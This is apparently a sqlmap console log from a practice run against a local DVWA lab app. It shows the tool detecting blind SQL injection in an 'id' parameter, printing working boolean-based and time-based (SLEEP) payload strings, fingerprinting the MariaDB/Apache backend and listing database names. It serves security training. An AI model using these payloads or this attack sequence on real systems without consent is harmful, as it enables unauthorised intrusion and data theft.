        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:54:11 /2025-10-18/

[01:54:11] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
do you want to check for the existence of site's sitemap(.xml) [y/N] N
[01:54:11] [INFO] starting crawler for target URL 'http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit'
[01:54:11] [INFO] searching for links with depth 1
[01:54:11] [INFO] starting 2 threads
[01:54:11] [CRITICAL] WAF/IPS identified as 'Approach'
do you want to normalize crawling results [Y/n] Y
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
[01:54:11] [INFO] found a total of 2 targets
[1/2] URL:
GET http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit
do you want to test this URL? [Y/n/q]
> Y
[01:54:11] [INFO] testing URL 'http://127.0.0.1:8080/vulnerabilities/sqli_blind/?id=1&Submit=Submit'
[01:54:11] [INFO] using '/root/.local/share/sqlmap/output/results-10182025_0154am.csv' as the CSV results file in multiple targets mode
[01:54:11] [INFO] testing connection to the target URL
[01:54:11] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:54:11] [INFO] testing if the target URL content is stable
[01:54:12] [INFO] target URL content is stable
[01:54:12] [INFO] testing if GET parameter 'id' is dynamic
[01:54:12] [WARNING] GET parameter 'id' does not appear to be dynamic
[01:54:12] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[01:54:12] [INFO] testing for SQL injection on GET parameter 'id'
[01:54:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:54:13] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[01:54:13] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[01:54:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[01:54:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[01:54:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[01:54:13] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[01:54:13] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[01:54:13] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[01:54:13] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[01:54:13] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[01:54:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:54:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:54:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:54:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:54:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[01:54:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[01:54:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:54:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[01:54:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[01:54:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:54:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[01:54:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[01:54:13] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[01:54:13] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[01:54:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:54:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[01:54:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[01:54:13] [INFO] testing 'Generic inline queries'
[01:54:13] [INFO] testing 'MySQL inline queries'
[01:54:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:54:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[01:54:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[01:54:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[01:54:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[01:54:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[01:54:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:54:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[01:54:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:54:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:54:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:54:23] [INFO] target URL appears to have 2 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[01:54:23] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[01:54:24] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[01:54:24] [INFO] testing 'Generic UNION query (22) - 21 to 40 columns'
[01:54:24] [INFO] testing 'Generic UNION query (22) - 41 to 60 columns'
[01:54:24] [INFO] testing 'Generic UNION query (22) - 61 to 80 columns'
[01:54:25] [INFO] testing 'Generic UNION query (22) - 81 to 100 columns'
[01:54:25] [INFO] testing 'MySQL UNION query (22) - 1 to 20 columns'
[01:54:25] [INFO] testing 'MySQL UNION query (22) - 21 to 40 columns'
[01:54:25] [INFO] testing 'MySQL UNION query (22) - 41 to 60 columns'
[01:54:26] [INFO] testing 'MySQL UNION query (22) - 61 to 80 columns'
[01:54:26] [INFO] testing 'MySQL UNION query (22) - 81 to 100 columns'
[01:54:26] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 362 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8793=8793-- SABr&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4560 FROM (SELECT(SLEEP(5)))NWkZ)-- dSdK&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n] Y
[01:54:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:54:27] [INFO] fetching database names
[01:54:27] [INFO] fetching number of databases

[01:54:27] [INFO] retrieved: 2
[01:54:27] [INFO] retrieving the length of query output

[01:54:27] [INFO] retrieved: 4
[01:54:27] [INFO] retrieved: ____
[01:54:27] [INFO] retrieved: 
[01:54:28] [INFO] retrieved: dvwa           
[01:54:28] [INFO] retrieved: dvwa
[01:54:28] [INFO] retrieving the length of query output

[01:54:28] [INFO] retrieved: 18
[01:54:28] [INFO] retrieved: __________________
[01:54:28] [INFO] retrieved: 
[01:54:30] [INFO] retrieved: information_schema             
[01:54:30] [INFO] retrieved: information_schema
available databases [2]:
[*] dvwa
[*] information_schema

[01:54:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 355 times
SQL injection vulnerability has already been detected against '127.0.0.1'. Do you want to skip further tests involving it? [Y/n] Y
[01:54:30] [INFO] skipping 'http://127.0.0.1:8080/vulnerabilities/fi/?page=include.php'
[01:54:30] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-10182025_0154am.csv'
[01:54:30] [WARNING] your sqlmap version is outdated

[*] ending @ 01:54:30 /2025-10-18/

